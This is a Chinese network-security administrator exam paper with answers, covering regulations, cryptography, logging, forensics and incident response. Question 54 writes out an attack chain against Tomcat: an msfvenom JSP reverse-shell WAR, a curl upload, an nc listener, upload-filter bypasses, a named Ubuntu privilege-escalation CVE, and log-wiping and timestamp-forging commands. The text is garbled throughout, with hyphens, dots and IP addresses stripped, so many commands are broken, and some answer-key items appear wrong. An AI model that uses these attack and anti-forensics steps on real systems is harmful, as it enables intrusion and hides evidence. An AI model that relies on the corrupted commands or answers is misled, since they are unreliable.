2025年网络信息安全管理员考试笔试试题(含答案)

2025年网络信息安全管理员考试笔试试题(含答案)一、单项选择题（每题1分，共30分。每题只有一个正确答案，请将正确选项的字母填在括号内）1.在《网络安全法》中，关键信息基础设施的运营者采购网络产品或服务时，应当履行的安全义务是（）。A.向公安机关备案B.通过国家网络安全审查C.向工信部申请许可D.向供应商索取源代码答案：B2.下列关于SSL/TLS握手协议的说法，正确的是（）。A.握手完成后仍使用明文传输B.握手阶段仅协商对称密钥C.服务端证书用于验证服务端身份D.客户端证书必须由国家CA签发答案：C3.某单位采用RAID5存储重要日志，若同时损坏两块磁盘，则（）。A.可通过热备盘自动恢复B.需人工干预但数据可完整恢复C.数据一定丢失D.可通过异或运算恢复答案：C4.在Linux系统中，若文件权限为“rwsrxrx”，则对该文件描述正确的是（）。A.所有用户均可写B.属主执行时具有属主权限C.属组用户可删除该文件D.其他用户可修改文件内容答案：B5.关于零信任架构，下列说法错误的是（）。A.默认信任内网流量B.以身份为基石C.动态访问控制D.持续信任评估答案：A6.利用“arps”命令静态绑定网关MAC地址，主要防范的攻击是（）。A.ICMP重定向B.ARP欺骗C.DHCP耗尽D.SYNFlood答案：B7.在GB/T222392019《信息安全技术网络安全等级保护基本要求》中，第三级要求“剩余信息保护”主要针对（）。A.网络边界B.主机内存C.机房空调D.审计报表答案：B8.某Web应用使用JWT作为会话令牌，若服务端仅使用HS256对称密钥签名且密钥硬编码在客户端，则存在的最大风险是（）。A.重放攻击B.令牌伪造C.会话固定D.XSS答案：B9.在Windows事件日志中，登录类型“3”表示（）。A.交互式登录B.网络登录C.批处理登录D.服务登录答案：B10.使用nmap扫描命令“nmapsSp165535/24”，其中“sS”的含义是（）。A.TCPConnect扫描B.SYN隐秘扫描C.UDP扫描D.ACK扫描答案：B11.关于国密算法SM2，下列说法正确的是（）。A.分组长度为128位B.基于椭圆曲线离散对数难题C.仅用于密钥交换D.签名速度低于RSA1024答案：B12.在Python中，若需防止SQL注入，最佳实践是（）。A.使用字符串拼接B.使用ORM且关闭预编译C.使用参数化查询D.过滤单引号即可答案：C13.某企业部署了EDR终端检测响应系统，其数据采集最依赖的层是（）。A.网络层B.传输层C.主机层D.应用层答案：C14.关于DNSSEC，下列记录类型用于存放公钥的是（）。A.AAAAB.RRSIGC.DNSKEYD.NSEC3答案：C15.在防火墙规则中，statefulinspection相较包过滤最大的优势是（）。A.处理速度更快B.可跟踪连接状态C.无需配置规则D.可防御DDoS答案：B16.某邮件服务器收到一封邮件，其SPF记录为“v=spf1ip4:/24all”，若源IP为，则接收方策略应为（）。A.中立B.软拒绝C.硬拒绝D.重试答案：C17.在渗透测试报告中，CVSSv3.1评分“8.9”属于（）。A.低危B.中危C.高危D.严重答案：C18.关于内存保护机制DEP，其原理是（）。A.栈不可执行B.堆不可读C.代码段不可写D.随机基址答案：A19.在Kubernetes中，用于限制容器CPU使用量的资源字段是（）。A.requests.cpuB.limits.cpuC.maxSurgeD.revisionHistoryLimit答案：B20.某单位采用“321”备份策略，其中“1”指（）。A.至少1份离线副本B.至少1台备份服务器C.至少1次全量/天D.至少1份加密答案：A21.关于WAF绕过技术，下列利用的是协议解析差异的是（）。A.Unicode编码B.JSON注释C.分块传输D.参数污染答案：D22.在ISO/IEC27001:2022中，关于供应商管理属于（）。A.A.5信息安全策略B.A.6组织安全C.A.15供应商关系D.A.18合规性答案：C23.某员工收到“内部补贴登记”二维码，扫码后自动下载木马，此类攻击归类为（）。A.BaitingB.QuidproquoC.PretextingD.Spearphishing答案：A24.在Wireshark中，过滤表达式“tcp.flags.syn==1andtcp.flags.ack==0”可捕获（）。A.SYNACK包B.纯SYN包C.FIN包D.RST包答案：B25.关于区块链51%攻击，成功后可实现（）。A.任意增发代币B.双花C.破解私钥D.修改他人余额答案：B26.在Windows中，用于查看当前登录用户SID的命令是（）。A.whoami/userB.netuserC.quserD.gpresult答案：A27.关于云原生安全，CSPM主要解决（）。A.容器逃逸B.配置合规C.微服务通信D.镜像漏洞答案：B28.在SIEM关联规则中，若设定“5分钟内同一源IP登录失败≥30次”触发告警，该规则主要检测（）。A.暴力破解B.横向移动C.数据渗漏D.权限提升答案：A29.关于GDPR，对数据控制者处以最高罚款的依据是（）。A.第58条B.第83条C.第29条D.第99条答案：B30.在Android应用逆向中，可查看组件声明的文件是（）。A.classes.dexB.AndroidManifest.xmlC.resources.arscD.lib.so答案：B二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）31.以下哪些属于对称加密算法（）。A.SM4B.AES128GCMC.RSA2048D.3DES答案：ABD32.关于日志审计，下列做法符合等级保护第三级要求的有（）。A.审计覆盖用户登录、权限变更B.审计记录保存6个月C.审计进程无法被非授权中断D.审计记录仅存储在本地磁盘答案：ABC33.以下哪些命令可用于Linux提权信息收集（）。A.sudolB.idC.unameaD.tasklist答案：ABC34.关于HTTP响应头安全，下列配置正确的有（）。A.XContentTypeOptions:nosniffB.XFrameOptions:DENYC.ContentSecurityPolicy:defaultsrcD.StrictTransportSecurity:maxage=0答案：AB35.以下属于OWASPTop102021新增风险的有（）。A.失效的访问控制B.加密失败C.服务端请求伪造D.不安全的反序列化答案：C36.关于勒索软件防御，有效的技术措施包括（）。A.网络分段B.白名单机制C.定期离线备份D.关闭所有宏脚本答案：ABC37.在Python代码审计中，可导致命令注入的函数有（）。A.os.systemB.subprocess.call(shell=True)C.execD.open答案：ABC38.关于IPv6安全，以下说法正确的有（）。A.IPSec为强制实现B.地址空间巨大可防扫描C.无需NAT故易暴露拓扑D.RA可伪造导致劫持答案：BCD39.以下属于社会工程学防御措施的有（）。A.双人控制B.安全意识培训C.红蓝对抗D.桌面演练答案：ABCD40.关于云安全责任共担模型，云服务商负责的有（）。A.物理基础设施B.虚拟化层C.客户数据D.应用配置答案：AB三、填空题（每空2分，共20分）41.在Linux系统中，文件/etc/shadow中密码字段为“!!”表示该账户________。答案：已被锁定42.使用openssl生成RSA私钥时，默认填充模式为________。答案：PKCS843.在SQLMap中，参数“tamper=space2comment”的作用是________。答案：将空格替换为注释符绕过过滤44.国家标准GB/T397862021《信息安全技术信息系统密码应用基本要求》中，物理和环境安全层面要求采用________技术对重要区域进行访问控制。答案：密码45.在Windows日志中，事件ID________表示成功清除审计日志。答案：110246.使用Hydra对SSH进行暴力破解时，常用模块名为________。答案：ssh47.在Kubernetes中，ServiceAccount令牌默认以________方式挂载到Pod。答案：ProjectedVolume48.在BGP安全中，用于验证路由起源的RPKI依赖的资源证书格式为________。答案：X.50949.在无线渗透中，WPA3SAE握手可防止________攻击。答案：离线字典50.在Python3中，使用hashlib计算SM3摘要需先安装第三方库________。答案：gmssl四、简答题（每题10分，共30分）51.简述内存马（MemoryWebShell）检测与清除的关键步骤。答案：1.检测：（1）利用JavaAgent遍历所有已加载类，对比可疑类名、类加载器、字节码特征；（2）通过JVMInstrumentAPI获取类字节码，计算哈希与基线库比对；（3）监控内存中新增Filter、Servlet、Listener，检查动态注册无落地文件；（4）使用内存取证工具（如memdump+Volatility）提取heap，搜索冰蝎、哥斯拉等密钥字符串。2.清除：（1）通过InstrumentationredefineClasses将恶意类字节码替换为空或抛出异常；（2）卸载异常ClassLoader，触发FullGC回收；（3）在web.xml或Spring配置中显式删除恶意组件注册；（4）重启JVM确保完全释放；（5）复盘攻击入口，修补上传漏洞、升级中间件。52.说明DNS隧道攻击原理，并给出三种有效检测方法。答案：原理：攻击者将C&C数据封装在DNS查询/响应的域名或TXT记录中，利用53端口UDP穿透防火墙，实现隐蔽通信。检测方法：1.流量特征：统计单台主机域名长度>50字节、entropy>4.5且请求频率>1000次/小时，触发告警；2.域名分析：对子域名进行Ngram建模，发现随机可读性低且与DGA库相似度>90%；3.负载检测：对TXT记录大小>200字节且响应包持续分片，进行深度解码，发现含base32编码的Shell指令。53.某单位采用MySQL主从复制，简述当主库遭受勒索软件加密后，如何在不支付赎金的前提下最大化恢复数据。答案：1.立即隔离主库，关闭网络防止扩散；2.检查从库是否被加密：若未加密且延迟<1秒，立即执行“stopslave”保留纯净数据；3.对从库做全量冷备：mysqldumpsingletransactionmasterdata=2>clean.sql；4.拉取主库binlog，使用mysqlbinlog解析未被加密的pos点，做增量恢复；5.在新实例导入clean.sql，应用binlog到攻击前pos；6.业务验证后，将从库提升为主库，修改应用连接；7.对旧主库进行镜像取证，追踪入侵路径；8.建立延迟复制+离线备份，完善321策略。五、综合应用题（共50分）54.渗透测试实战分析（20分）背景：授权对IP5进行黑盒测试，发现其开放8080端口运行Tomcat9.0.83，默认页面存在“/examples”目录，可上传war包。任务：（1）写出制作并部署Webshell的完整命令序列（使用msfvenom生成JSP反向Shell，LHOST=，LPORT=4444）；（6分）（2）说明如何绕过可能的“.jsp”上传过滤；（4分）（3）成功反弹Shell后，发现目标为Ubuntu22.04内核5.15.067，给出本地权限提升的利用链（给出CVE编号及利用要点，无需细节）；（6分）（4）在清除痕迹阶段，需删除哪些日志及命令。（4分）答案：（1）msfvenompjava/jsp_shell_reverse_tcpLHOST=LPORT=4444fwaroshell.warcurlXPOSTF"file=@shell.war"5:8080/examples/upload.jspnclvnp4444（2）将shell.war重命名为shell.jspx利用Tomcat解析差异；或打包时在WEBINF/web.xml中注册<jspfile>shell.jsp</jspfile>，实际文件名用shell.png绕过前端检测，后利用PUT方法上传至/examples/，再通过MOVE重命名为shell.war。（3）CVE20232640GameOver(lay)Ubuntu本地提权，利用overlayfs未授权挂载，普通用户可写/etc/passwd。（4）删除~/.bash_history、/var/log/tomcat/localhost_access_log.、/var/log/auth.log中相关条目，使用sedi'//d'文件；清空systemdjournal：journalctlvacuumtime=1s；重置inode时间：touchr/bin/sh/tmp/shell.war。55.安全运营与应急响应（15分）场景：2025060109:10，SIEM产生高危告警：内网IP00对域控的445端口大量发送异常SMB流量，特征为“TreeConnectAndXRequest”中ShareName=“ADMIN$”失败次数>500次。问题：（1）判断攻击阶段并说明依据；（3分）（2）给出遏制攻击的三种立即处置措施；（6分）（3）若需提取攻击者横向移动证据，应重点采集哪些Windows取证工件？（6分）答案：（1）横向移动阶段，依据：利用ADMIN$默认共享尝试连接域控，为PasstheHash或暴力破解的前置步骤。（2）1.在核心交换机上对00做ACL丢弃445出口流量；2.禁用该主机账户或下线隔离；3.在域控上立即启用Windows防火墙入站规则禁止/24访问445。（3）1.域控%SystemRoot%\System32\winevt\Logs\Security.evtx，筛选事件ID4625、4624、4672；2.注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares，查看异常共享访问；3.内存转储提取lsass.